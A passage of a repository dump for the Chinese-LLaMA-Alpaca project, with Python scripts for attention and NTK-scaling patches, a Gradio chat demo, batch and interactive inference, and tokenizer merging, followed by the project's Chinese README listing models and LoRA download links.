...].to(dtype=x.dtype), sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) else: return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) def apply_attention_patch( use_memory_efficient_attention=False, store_kv_before_rope=False ): global USE_MEM_EFF_ATTENTION, STORE_KV_BEFORE_ROPE if use_memory_efficient_attention is True and xops is not None: USE_MEM_EFF_ATTENTION = use_memory_efficient_attention print("USE_MEM_EFF_ATTENTION: ",USE_MEM_EFF_ATTENTION) STORE_KV_BEFORE_ROPE = store_kv_before_rope print("STORE_KV_BEFORE_ROPE:", STORE_KV_BEFORE_ROPE) transformers.models.llama.modeling_llama.LlamaAttention.forward = xformers_forward def apply_ntk_scaling_patch(alpha: Union[float,str]): global ALPHA ALPHA = alpha try: ALPHA = float(ALPHA) except ValueError: if ALPHA!="auto": raise ValueError(f"Alpha can only be a float or 'auto', but given {ALPHA}") print(f"Apply NTK scaling with ALPHA={ALPHA}") transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ = adaptive_ntk_init transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.forward = adaptive_ntk_forward File: scripts/inference/gradio_demo.py import torch from transformers import ( LlamaForCausalLM, LlamaTokenizer, StoppingCriteria, ) import gradio as gr import argparse import os from queue import Queue from threading import Thread import traceback import gc # Parse command-line arguments parser = argparse.ArgumentParser() parser.add_argument( '--base_model', default=None, type=str, required=True, help='Base model path') parser.add_argument('--lora_model', default=None, type=str, help="If None, perform inference on the base model") parser.add_argument( '--tokenizer_path', default=None, type=str, help='If None, lora model path or base model path will be used') parser.add_argument( '--gpus', default="0", type=str, help='If None, cuda:0 will be used. Inference using multi-cards: --gpus=0,1,... ') parser.add_argument('--share', default=True, help='Share gradio domain name') parser.add_argument('--port', default=19324, type=int, help='Port of gradio demo') parser.add_argument( '--max_memory', default=256, type=int, help='Maximum input prompt length, if exceeded model will receive prompt[-max_memory:]') parser.add_argument( '--load_in_8bit', action='store_true', help='Use 8 bit quantified model') parser.add_argument( '--only_cpu', action='store_true', help='Only use CPU for inference') parser.add_argument( '--alpha', type=str, default="1.0", help="The scaling factor of NTK method, can be a float or 'auto'. ") args = parser.parse_args() if args.only_cpu is True: args.gpus = "" from patches import apply_attention_patch, apply_ntk_scaling_patch apply_attention_patch(use_memory_efficient_attention=True) apply_ntk_scaling_patch(args.alpha) # Set CUDA devices if available os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus # Peft library can only import after setting CUDA devices from peft import PeftModel # Set up the required components: model and tokenizer def setup(): global tokenizer, model, device, share, port, max_memory max_memory = args.max_memory port = args.port share = args.share load_in_8bit = args.load_in_8bit load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') if args.tokenizer_path is None: args.tokenizer_path = args.lora_model if args.lora_model is None: args.tokenizer_path = args.base_model tokenizer = LlamaTokenizer.from_pretrained(args.tokenizer_path) base_model = LlamaForCausalLM.from_pretrained( args.base_model, load_in_8bit=load_in_8bit, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto', ) model_vocab_size = base_model.get_input_embeddings().weight.size(0) tokenzier_vocab_size = len(tokenizer) print(f"Vocab of the base model: {model_vocab_size}") print(f"Vocab of the tokenizer: {tokenzier_vocab_size}") if model_vocab_size != tokenzier_vocab_size: assert tokenzier_vocab_size > model_vocab_size print("Resize model embeddings to fit tokenizer") base_model.resize_token_embeddings(tokenzier_vocab_size) if args.lora_model is not None: print("loading peft model") model = PeftModel.from_pretrained( base_model, args.lora_model, torch_dtype=load_type, device_map='auto', ) else: model = base_model if device == torch.device('cpu'): model.float() model.eval() # Reset the user input def reset_user_input(): return gr.update(value='') # Reset the state def reset_state(): return [] # Generate the prompt for the input of LM model def generate_prompt(instruction): return f""" Below is an instruction that describes a task. Write a response that appropriately completes the request. {instruction} """ # User interaction function for chat def user(user_message, history): return gr.update(value="", interactive=False), history + \ [[user_message, None]] class Stream(StoppingCriteria): def __init__(self, callback_func=None): self.callback_func = callback_func def __call__(self, input_ids, scores) -> bool: if self.callback_func is not None: self.callback_func(input_ids[0]) return False class Iteratorize: """ Transforms a function that takes a callback into a lazy iterator (generator). Adapted from: https://stackoverflow.com/a/9969000 """ def __init__(self, func, kwargs=None, callback=None): self.mfunc = func self.c_callback = callback self.q = Queue() self.sentinel = object() self.kwargs = kwargs or {} self.stop_now = False def _callback(val): if self.stop_now: raise ValueError self.q.put(val) def gentask(): try: ret = self.mfunc(callback=_callback, **self.kwargs) except ValueError: pass except Exception: traceback.print_exc() clear_torch_cache() self.q.put(self.sentinel) if self.c_callback: self.c_callback(ret) self.thread = Thread(target=gentask) self.thread.start() def __iter__(self): return self def __next__(self): obj = self.q.get(True, None) if obj is self.sentinel: raise StopIteration else: return obj def __del__(self): clear_torch_cache() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop_now = True clear_torch_cache() def clear_torch_cache(): gc.collect() if torch.cuda.device_count() > 0: torch.cuda.empty_cache() # Perform prediction based on the user input and history @torch.no_grad() def predict( history, max_new_tokens=128, top_p=0.75, temperature=0.1, top_k=40, do_sample=True, repetition_penalty=1.0 ): history[-1][1] = "" if len(history) != 0: input = "".join(["### Instruction:\n" + i[0] + "\n\n" + "### Response: " + i[1] + ("\n\n" if i[1] != "" else "") for i in history]) if len(input) > max_memory: input = input[-max_memory:] prompt = generate_prompt(input) inputs = tokenizer(prompt, return_tensors="pt") input_ids = inputs["input_ids"].to(device) generate_params = { 'input_ids': input_ids, 'max_new_tokens': max_new_tokens, 'top_p': top_p, 'temperature': temperature, 'top_k': top_k, 'do_sample': do_sample, 'repetition_penalty': repetition_penalty, } def generate_with_callback(callback=None, **kwargs): if 'stopping_criteria' in kwargs: kwargs['stopping_criteria'].append(Stream(callback_func=callback)) else: kwargs['stopping_criteria'] = [Stream(callback_func=callback)] clear_torch_cache() with torch.no_grad(): model.generate(**kwargs) def generate_with_streaming(**kwargs): return Iteratorize(generate_with_callback, kwargs, callback=None) with generate_with_streaming(**generate_params) as generator: for output in generator: next_token_ids = output[len(input_ids[0]):] if next_token_ids[0] == tokenizer.eos_token_id: break new_tokens = tokenizer.decode( next_token_ids, skip_special_tokens=True) if isinstance(tokenizer, LlamaTokenizer) and len(next_token_ids) > 0: if tokenizer.convert_ids_to_tokens(int(next_token_ids[0])).startswith('▁'): new_tokens = ' ' + new_tokens history[-1][1] = new_tokens yield history if len(next_token_ids) >= max_new_tokens: break # Call the setup function to initialize the components setup() # Create the Gradio interface with gr.Blocks() as demo: github_banner_path = 'https://raw.githubusercontent.com/ymcui/Chinese-LLaMA-Alpaca/main/pics/banner.png' gr.HTML(f'<p align="center"><a href="https://github.com/ymcui/Chinese-LLaMA-Alpaca"><img src={github_banner_path} width="700"/></a></p>') gr.Markdown("> 为了促进大模型在中文NLP社区的开放研究,本项目开源了中文LLaMA模型和指令精调的Alpaca大模型。这些模型在原版LLaMA的基础上扩充了中文词表并使用了中文数据进行二次预训练,进一步提升了中文基础语义理解能力。同时,中文Alpaca模型进一步使用了中文指令数据进行精调,显著提升了模型对指令的理解和执行能力。") chatbot = gr.Chatbot() with gr.Row(): with gr.Column(scale=4): with gr.Column(scale=12): user_input = gr.Textbox( show_label=False, placeholder="Shift + Enter发送消息...", lines=10).style( container=False) with gr.Column(min_width=32, scale=1): submitBtn = gr.Button("Submit", variant="primary") with gr.Column(scale=1): emptyBtn = gr.Button("Clear History") max_new_token = gr.Slider( 0, 4096, value=512, step=1.0, label="Maximum New Token Length", interactive=True) top_p = gr.Slider(0, 1, value=0.9, step=0.01, label="Top P", interactive=True) temperature = gr.Slider( 0, 1, value=0.5, step=0.01, label="Temperature", interactive=True) top_k = gr.Slider(1, 40, value=40, step=1, label="Top K", interactive=True) do_sample = gr.Checkbox( value=True, label="Do Sample", info="use random sample strategy", interactive=True) repetition_penalty = gr.Slider( 1.0, 3.0, value=1.1, step=0.1, label="Repetition Penalty", interactive=True) params = [user_input, chatbot] predict_params = [ chatbot, max_new_token, top_p, temperature, top_k, do_sample, repetition_penalty] submitBtn.click( user, params, params, queue=False).then( predict, predict_params, chatbot).then( lambda: gr.update( interactive=True), None, [user_input], queue=False) user_input.submit( user, params, params, queue=False).then( predict, predict_params, chatbot).then( lambda: gr.update( interactive=True), None, [user_input], queue=False) submitBtn.click(reset_user_input, [], [user_input]) emptyBtn.click(reset_state, outputs=[chatbot], show_progress=True) # Launch the Gradio interface demo.queue().launch( share=share, inbrowser=True, server_name='0.0.0.0', server_port=port) File: scripts/inference/inference_hf.py import argparse import json, os parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, type=str, required=True) parser.add_argument('--lora_model', default=None, type=str,help="If None, perform inference on the base model") parser.add_argument('--tokenizer_path',default=None,type=str) parser.add_argument('--data_file',default=None, type=str,help="A file that contains instructions (one instruction per line)") parser.add_argument('--with_prompt',action='store_true',help="wrap the input with the prompt automatically") parser.add_argument('--interactive',action='store_true',help="run in the instruction mode (single-turn)") parser.add_argument('--predictions_file', default='./predictions.json', type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--only_cpu',action='store_true',help='only use CPU for inference') parser.add_argument('--alpha',type=str,default="1.0", help="The scaling factor of NTK method, can be a float or 'auto'. ") parser.add_argument('--load_in_8bit',action='store_true', help="Load the LLM in the 8bit mode") args = parser.parse_args() if args.only_cpu is True: args.gpus = "" os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus import torch from transformers import LlamaForCausalLM, LlamaTokenizer from peft import PeftModel from patches import apply_attention_patch, apply_ntk_scaling_patch apply_attention_patch(use_memory_efficient_attention=True) apply_ntk_scaling_patch(args.alpha) generation_config = dict( temperature=0.2, top_k=40, top_p=0.9, do_sample=True, num_beams=1, repetition_penalty=1.1, max_new_tokens=400 ) # The prompt template below is taken from llama.cpp # and is slightly different from the one used in training. # But we find it gives better results prompt_input = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n\n{instruction}\n\n### Response:\n\n" ) sample_data = ["为什么要减少污染,保护环境?"] def generate_prompt(instruction, input=None): if input: instruction = instruction + '\n' + input return prompt_input.format_map({'instruction': instruction}) if __name__ == '__main__': load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') if args.tokenizer_path is None: args.tokenizer_path = args.lora_model if args.lora_model is None: args.tokenizer_path = args.base_model tokenizer = LlamaTokenizer.from_pretrained(args.tokenizer_path) base_model = LlamaForCausalLM.from_pretrained( args.base_model, load_in_8bit=args.load_in_8bit, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto', ) model_vocab_size = base_model.get_input_embeddings().weight.size(0) tokenzier_vocab_size = len(tokenizer) print(f"Vocab of the base model: {model_vocab_size}") print(f"Vocab of the tokenizer: {tokenzier_vocab_size}") if model_vocab_size!=tokenzier_vocab_size: assert tokenzier_vocab_size > model_vocab_size print("Resize model embeddings to fit tokenizer") base_model.resize_token_embeddings(tokenzier_vocab_size) if args.lora_model is not None: print("loading peft model") model = PeftModel.from_pretrained(base_model, args.lora_model,torch_dtype=load_type,device_map='auto',) else: model = base_model if device==torch.device('cpu'): model.float() # test data if args.data_file is None: examples = sample_data else: with open(args.data_file,'r') as f: examples = [l.strip() for l in f.readlines()] print("first 10 examples:") for example in examples[:10]: print(example) model.eval() with torch.no_grad(): if args.interactive: print("Start inference with instruction mode.") print('='*85) print("+ 该模式下仅支持单轮问答,无多轮对话能力。\n" "+ 如要进行多轮对话,请使用llama.cpp或llamachat工具。") print('-'*85) print("+ This mode only supports single-turn QA.\n" "+ If you want to experience multi-turn dialogue, please use llama.cpp or llamachat.") print('='*85) while True: raw_input_text = input("Input:") if len(raw_input_text.strip())==0: break if args.with_prompt: input_text = generate_prompt(instruction=raw_input_text) else: input_text = raw_input_text inputs = tokenizer(input_text,return_tensors="pt") #add_special_tokens=False ? generation_output = model.generate( input_ids = inputs["input_ids"].to(device), attention_mask = inputs['attention_mask'].to(device), eos_token_id=tokenizer.eos_token_id, pad_token_id=tokenizer.pad_token_id, **generation_config ) s = generation_output[0] output = tokenizer.decode(s,skip_special_tokens=True) if args.with_prompt: response = output.split("### Response:")[1].strip() else: response = output print("Response: ",response) print("\n") else: print("Start inference.") results = [] for index, example in enumerate(examples): if args.with_prompt is True: input_text = generate_prompt(instruction=example) else: input_text = example inputs = tokenizer(input_text,return_tensors="pt") #add_special_tokens=False ? generation_output = model.generate( input_ids = inputs["input_ids"].to(device), attention_mask = inputs['attention_mask'].to(device), eos_token_id=tokenizer.eos_token_id, pad_token_id=tokenizer.pad_token_id, **generation_config ) s = generation_output[0] output = tokenizer.decode(s,skip_special_tokens=True) if args.with_prompt: response = output.split("### Response:")[1].strip() else: response = output print(f"======={index}=======") print(f"Input: {example}\n") print(f"Output: {response}\n") results.append({"Input":input_text,"Output":response}) dirname = os.path.dirname(args.predictions_file) os.makedirs(dirname,exist_ok=True) with open(args.predictions_file,'w') as f: json.dump(results,f,ensure_ascii=False,indent=2) with open(dirname+'/generation_config.json','w') as f: json.dump(generation_config,f,ensure_ascii=False,indent=2) File: scripts/merge_tokenizer/merge_tokenizers.py import os os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"]="python" from transformers import LlamaTokenizer from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model import sentencepiece as spm import argparse parser = argparse.ArgumentParser() parser.add_argument('--llama_tokenizer_dir', default=None, type=str, required=True) parser.add_argument('--chinese_sp_model_file', default='./chinese_sp.model', type=str) args = parser.parse_args() llama_tokenizer_dir = args.llama_tokenizer_dir chinese_sp_model_file = args.chinese_sp_model_file # load llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir) chinese_sp_model = spm.SentencePieceProcessor() chinese_sp_model.Load(chinese_sp_model_file) llama_spm = sp_pb2_model.ModelProto() llama_spm.ParseFromString(llama_tokenizer.sp_model.serialized_model_proto()) chinese_spm = sp_pb2_model.ModelProto() chinese_spm.ParseFromString(chinese_sp_model.serialized_model_proto()) # print number of tokens print(len(llama_tokenizer),len(chinese_sp_model)) print(llama_tokenizer.all_special_tokens) print(llama_tokenizer.all_special_ids) print(llama_tokenizer.special_tokens_map) ## Add Chinese tokens to LLaMA tokenizer llama_spm_tokens_set=set(p.piece for p in llama_spm.pieces) print(len(llama_spm_tokens_set)) print(f"Before:{len(llama_spm_tokens_set)}") for p in chinese_spm.pieces: piece = p.piece if piece not in llama_spm_tokens_set: new_p = sp_pb2_model.ModelProto().SentencePiece() new_p.piece = piece new_p.score = 0 llama_spm.pieces.append(new_p) print(f"New model pieces: {len(llama_spm.pieces)}") ## Save output_sp_dir = 'merged_tokenizer_sp' output_hf_dir = 'merged_tokenizer_hf' # the path to save Chinese-LLaMA tokenizer os.makedirs(output_sp_dir,exist_ok=True) with open(output_sp_dir+'/chinese_llama.model', 'wb') as f: f.write(llama_spm.SerializeToString()) tokenizer = LlamaTokenizer(vocab_file=output_sp_dir+'/chinese_llama.model') tokenizer.save_pretrained(output_hf_dir) print(f"Chinese-LLaMA tokenizer has been saved to {output_hf_dir}") # Test llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir) chinese_llama_tokenizer = LlamaTokenizer.from_pretrained(output_hf_dir) print(tokenizer.all_special_tokens) print(tokenizer.all_special_ids) print(tokenizer.special_tokens_map) text='''白日依山尽,黄河入海流。欲穷千里目,更上一层楼。 The primary use of LLaMA is research on large language models, including''' print("Test text:\n",text) print(f"Tokenized by LLaMA tokenizer:{llama_tokenizer.tokenize(text)}") print(f"Tokenized by Chinese-LLaMA tokenizer:{chinese_llama_tokenizer.tokenize(text)}")
# [Chinese-LLaMA-Alpaca-3](https://github.com/ymcui/Chinese-LLaMA-Alpaca-3)项目启动! [**🇨🇳中文**](./README.md) | [**🌐English**](./README_EN.md) | [**📖文档/Docs**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki) | [**❓提问/Issues**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/issues) | [**💬讨论/Discussions**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions) | [**⚔️竞技场/Arena**](http://llm-arena.ymcui.com/) <p align="center"> <br> <img src="./pics/banner.png" width="700"/> <br> </p> <p align="center"> <img alt="GitHub" src="https://img.shields.io/github/license/ymcui/Chinese-LLaMA-Alpaca.svg?color=blue&style=flat-square"> <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/ymcui/Chinese-LLaMA-Alpaca"> <img alt="GitHub top language" src="https://img.shields.io/github/languages/top/ymcui/Chinese-LLaMA-Alpaca"> <img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/ymcui/Chinese-LLaMA-Alpaca"> <a href="https://app.codacy.com/gh/ymcui/Chinese-LLaMA-Alpaca/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade"><img src="https://app.codacy.com/project/badge/Grade/1710faac5e634acaabfc26b0a778cdde"/></a> </p> 本项目开源了**中文LLaMA模型和指令精调的Alpaca大模型**,以进一步促进大模型在中文NLP社区的开放研究。这些模型**在原版LLaMA的基础上扩充了中文词表**并使用了中文数据进行二次预训练,进一步提升了中文基础语义理解能力。同时,中文Alpaca模型进一步使用了中文指令数据进行精调,显著提升了模型对指令的理解和执行能力。 **技术报告(V2)**:[[Cui, Yang, and Yao] Efficient and Effective Text Encoding for Chinese LLaMA and Alpaca](https://arxiv.org/abs/2304.08177) **本项目主要内容:** - 🚀 针对原版LLaMA模型扩充了中文词表,提升了中文编解码效率 - 🚀 开源了使用中文文本数据预训练的中文LLaMA以及经过指令精调的中文Alpaca - 🚀 开源了预训练脚本、指令精调脚本,用户可根据需要进一步训练模型 - 🚀 快速使用笔记本电脑(个人PC)的CPU/GPU本地量化和部署体验大模型 - 🚀 支持[🤗transformers](https://github.com/huggingface/transformers), [llama.cpp](https://github.com/ggerganov/llama.cpp), [text-generation-webui](https://github.com/oobabooga/text-generation-webui), [LlamaChat](https://github.com/alexrozanski/LlamaChat), [LangChain](https://github.com/hwchase17/langchain), [privateGPT](https://github.com/imartinez/privateGPT)等生态 - 目前已开源的模型版本:7B(基础版、**Plus版**、**Pro版**)、13B(基础版、**Plus版**、**Pro版**)、33B(基础版、**Plus版**、**Pro版**) 💡 下图是中文Alpaca-Plus-7B模型在本地CPU量化部署后的实际体验速度和效果。 ![](./pics/screencast.gif) ---- [**中文LLaMA-2&Alpaca-2大模型**](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2) | [多模态中文LLaMA&Alpaca大模型](https://github.com/airaria/Visual-Chinese-LLaMA-Alpaca) | [多模态VLE](https://github.com/iflytek/VLE) | [中文MiniRBT](https://github.com/iflytek/MiniRBT) | [中文LERT](https://github.com/ymcui/LERT) | [中英文PERT](https://github.com/ymcui/PERT) | [中文MacBERT](https://github.com/ymcui/MacBERT) | [中文ELECTRA](https://github.com/ymcui/Chinese-ELECTRA) | [中文XLNet](https://github.com/ymcui/Chinese-XLNet) | [中文BERT](https://github.com/ymcui/Chinese-BERT-wwm) | [知识蒸馏工具TextBrewer](https://github.com/airaria/TextBrewer) | [模型裁剪工具TextPruner](https://github.com/airaria/TextPruner) ## 新闻 **[2024/04/30] Chinese-LLaMA-Alpaca-3 已正式发布,开源基于Llama-3的Llama-3-Chinese-8B和Llama-3-Chinese-8B-Instruct,推荐所有一期、二期项目用户升级至三代模型,请参阅:https://github.com/ymcui/Chinese-LLaMA-Alpaca-3** [2024/03/27] 本项目已入驻机器之心SOTA!模型平台,欢迎关注:https://sota.jiqizhixin.com/project/chinese-llama-alpaca [2023/08/14] Chinese-LLaMA-Alpaca-2 v2.0版本已正式发布,开源Chinese-LLaMA-2-13B和Chinese-Alpaca-2-13B,推荐所有一期用户升级至二代模型,请参阅:https://github.com/ymcui/Chinese-LLaMA-Alpaca-2 [2023/07/31] Chinese-LLaMA-Alpaca-2 v1.0版本已正式发布,请参阅:https://github.com/ymcui/Chinese-LLaMA-Alpaca-2 [2023/07/19] [v5.0版本](https://github.com/ymcui/Chinese-LLaMA-Alpaca/releases/tag/v5.0): 发布Alpaca-Pro系列模型,显著提升回复长度和质量;同时发布Plus-33B系列模型。 [2023/07/19] 🚀启动[中文LLaMA-2、Alpaca-2开源大模型项目](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2),欢迎关注了解最新信息。 [2023/07/10] Beta测试预览,提前了解即将到来的更新:详见[讨论区](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions/732) [2023/07/07] Chinese-LLaMA-Alpaca家族再添新成员,推出面向视觉问答与对话的[多模态中文LLaMA&Alpaca大模型](https://github.com/airaria/Visual-Chinese-LLaMA-Alpaca),发布了7B测试版本。 [2023/06/30] llama.cpp下8K context支持(无需对模型做出修改),相关方法和讨论见[讨论区](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions/696);transformers下支持4K+ context的代码请参考[PR#705](https://github.com/ymcui/Chinese-LLaMA-Alpaca/pull/705) [2023/06/16] [v4.1版本](https://github.com/ymcui/Chinese-LLaMA-Alpaca/releases/tag/v4.1): 发布新版技术报告、添加C-Eval解码脚本、添加低资源模型合并脚本等。 [2023/06/08] [v4.0版本](https://github.com/ymcui/Chinese-LLaMA-Alpaca/releases/tag/v4.0): 发布中文LLaMA/Alpaca-33B、添加privateGPT使用示例、添加C-Eval结果等。 ## 内容导引 | 章节 | 描述 | | ------------------------------------- | ------------------------------------------------------------ | | [⏬模型下载](#模型下载) | 中文LLaMA、Alpaca大模型下载地址 | | [🈴合并模型](#合并模型) | (重要)介绍如何将下载的LoRA模型与原版LLaMA合并 | | [💻本地推理与快速部署](#本地推理与快速部署) | 介绍了如何对模型进行量化并使用个人电脑部署并体验大模型 | | [💯系统效果](#系统效果) | 介绍了部分场景和任务下的使用体验效果 | | [📝训练细节](#训练细节) | 介绍了中文LLaMA、Alpaca大模型的训练细节 | | [❓FAQ](#FAQ) | 一些常见问题的回复 | | [⚠️局限性](#局限性) | 本项目涉及模型的局限性 | ## 模型下载 ### 用户须知(必读) Facebook官方发布的[LLaMA模型禁止商用](https://github.com/facebookresearch/llama),并且官方没有正式开源模型权重(虽然网上已经有很多第三方的下载地址)。为了遵循相应的许可,**这里发布的是LoRA权重**,可以理解为原LLaMA模型上的一个“补丁”,两者合并即可获得完整版权重。以下中文LLaMA/Alpaca LoRA模型无法单独使用,需要搭配[原版LLaMA模型](https://github.com/facebookresearch/llama)。请参考本项目给出的[合并模型](#合并模型)步骤重构模型。 ### 模型列表 下图展示了本项目以及[二期项目](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2)推出的所有大模型之间的关系。 ![](./pics/models.png) ### 模型选择指引 下面是中文LLaMA和Alpaca模型的基本对比以及建议使用场景(包括但不限于),更多内容见[训练细节](#训练细节)。 | 对比项 | 中文LLaMA | 中文Alpaca | | :-------------------- | ------------------------------------------------------ | ------------------------------------------------------------ | | 训练方式 | 传统CLM | 指令精调 | | 模型类型 | 基座模型 | 指令理解模型(类ChatGPT) | | 训练语料 | 无标注通用语料 | 有标注指令数据 | | 词表大小<sup>[3]</sup> | 4995**3** | 4995**4**=49953+1(pad token) | | 输入模板 | 不需要 | 需要符合模板要求<sup>[1]</sup> | | 适用场景 ✔️ | 文本续写:给定上文内容,让模型生成下文 | 指令理解(问答、写作、建议等);多轮上下文理解(聊天等) | | 不适用场景 ❌ | 指令理解 、多轮聊天等 | 文本无限制自由生成 | | llama.cpp | 使用`-p`参数指定上文 | 使用`-ins`参数启动指令理解+聊天模式 | | text-generation-webui | 不适合chat模式 | 使用`--cpu`可在无显卡形式下运行 | | LlamaChat | 加载模型时选择"LLaMA" | 加载模型时选择"Alpaca" | | [HF推理代码](./scripts/inference/inference_hf.py) | 无需添加额外启动参数 | 启动时添加参数 `--with_prompt` | | [web-demo代码](./scripts/inference/gradio_demo.py) | 不适用 | 直接提供Alpaca模型位置即可;支持多轮对话 | | [LangChain示例](./scripts/langchain) / privateGPT | 不适用 | 直接提供Alpaca模型位置即可 | | 已知问题 | 如果不控制终止,则会一直写下去,直到达到输出长度上限。<sup>[2]</sup> | 请使用Pro版,以避免Plus版回复过短的问题。 | *[1] llama.cpp/LlamaChat/[HF推理代码](./scripts/inference/inference_hf.py)/[web-demo代码](./scripts/inference/gradio_demo.py)/[LangChain示例](./scripts/langchain)等已内嵌,无需手动添加模板。*<br/> *[2] 如果出现模型回答质量特别低、胡言乱语、不理解问题等情况,请检查是否使用了正确的模型和启动参数。*<br/> *[3] 经过指令精调的Alpaca会比LLaMA多一个pad token,**因此请勿混用LLaMA/Alpaca词表**。* ### 推荐模型下载 以下为本项目推荐使用的模型列表,通常使用了更多的训练数据和优化的模型训练方法和参数,请优先使用这些模型(其余模型请查看[其他模型](#其他模型))。**如希望体验类ChatGPT对话交互,请使用Alpaca模型,而不是LLaMA模型。** 对于Alpaca模型,Pro版针对回复内容过短的问题进行改进,模型回复效果有明显提升;如果更偏好短回复,请选择Plus系列。 | 模型名称 | 类型 | 训练数据 | 重构模型<sup>[1]</sup> | 大小<sup>[2]</sup> | LoRA下载<sup>[3]</sup> | | :------------------------ | :------: | :------: | :--------------------------------------------------------: | :----------------: | :----------------------------------------------------------: | | Chinese-LLaMA-Plus-7B | 基座模型 | 通用120G | 原版LLaMA-7B | 790M | [[百度]](https://pan.baidu.com/s/1zvyX9FN-WSRDdrtMARxxfw?pwd=2gtr) [[Google]](https://drive.google.com/file/d/1N97m3rBj-rp-J1X8rgRfluyomEscfAq0/view?usp=sharing) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-plus-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-plus-lora-7b) | | Chinese-LLaMA-Plus-13B | 基座模型 | 通用120G | 原版LLaMA-13B | 1.0G | [[百度]](https://pan.baidu.com/s/1VGpNlrLx5zHuNzLOcTG-xw?pwd=8cvd) [[Google]](https://drive.google.com/file/d/1q0L5Me_1j_9iiRRNfuEFUt3SOjQo3-g3/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-plus-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-plus-lora-13b)| | Chinese-LLaMA-Plus-33B 🆕 | 基座模型 | 通用120G | 原版LLaMA-33B | 1.3G<sup>[6]</sup> | [[百度]](https://pan.baidu.com/s/1v2WsSA0RFyVfy7FXY9A2NA?pwd=n8ws) [[Google]](https://drive.google.com/file/d/1S4pBPiIZo7fXqf8hjnFaeE7Z-yZFEta9/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-plus-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-plus-lora-33b)| | Chinese-Alpaca-Pro-7B 🆕 | 指令模型 | 指令4.3M | *原版LLaMA-7B &<br/>LLaMA-Plus-7B*<sup>[4]</sup> | 1.1G | [[百度]](https://pan.baidu.com/s/1M7whRwG5DRRkzRXCH4aF3g?pwd=fqpd) [[Google]](https://drive.google.com/file/d/1yfIJ2IXymaTaJ8l7VMnb5LnvQFx3idh-/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-pro-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-pro-lora-7b) | | Chinese-Alpaca-Pro-13B 🆕 | 指令模型 | 指令4.3M | *原版LLaMA-13B &<br/>LLaMA-Plus-13B<sup>[4]</sup>* | 1.3G | [[百度]](https://pan.baidu.com/s/1ok5Iiou-MovZa7bFLvt4uA?pwd=m79g) [[Google]](https://drive.google.com/file/d/1IY8PzMje1LM2bIgnniArnmmE8qYaJV_I/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-pro-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-pro-lora-13b)| | Chinese-Alpaca-Pro-33B 🆕 | 指令模型 | 指令4.3M | *原版LLaMA-33B &<br/>LLaMA-Plus-33B<sup>[4]</sup>* | 2.1G | [[百度]](https://pan.baidu.com/s/1u2TWZcsG_PZSTnmuu7vwww?pwd=8zj8) [[Google]](https://drive.google.com/file/d/14sFEhRq9c-p8S_TiVYNBnmPr4hk-nhs-/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-pro-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-pro-lora-33b)| *[1] 重构需要原版LLaMA模型,[去LLaMA项目申请使用](https://github.com/facebookresearch/llama)或参考这个[PR](https://github.com/facebookresearch/llama/pull/73/files)。因版权问题本项目无法提供下载链接。*<br/> *[2] 经过重构后的模型大小比同等量级的原版LLaMA大一些(主要因为扩充了词表)。*<br/> *[3] 下载后务必检查压缩包中模型文件的SHA256是否一致,请查看[SHA256.md](./SHA256.md)。*<br/> *[4] Alpaca-Plus模型需要同时下载对应的LLaMA-Plus模型,请参考[合并教程](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/手动模型合并与转换#多lora权重合并适用于chinese-alpaca-plus)。*<br/> *[5] 有些地方称为30B,实际上是Facebook在发布模型时写错了,论文里仍然写的是33B。*<br/>*[6] 采用FP16存储,故模型体积较小。* 压缩包内文件目录如下(以Chinese-LLaMA-7B为例): ``` chinese_llama_lora_7b/ - adapter_config.json # LoRA权重配置文件 - adapter_model.bin # LoRA权重文件 - special_tokens_map.json # special_tokens_map文件 - tokenizer_config.json # tokenizer配置文件 - tokenizer.model # tokenizer文件 ``` ### 其他模型下载 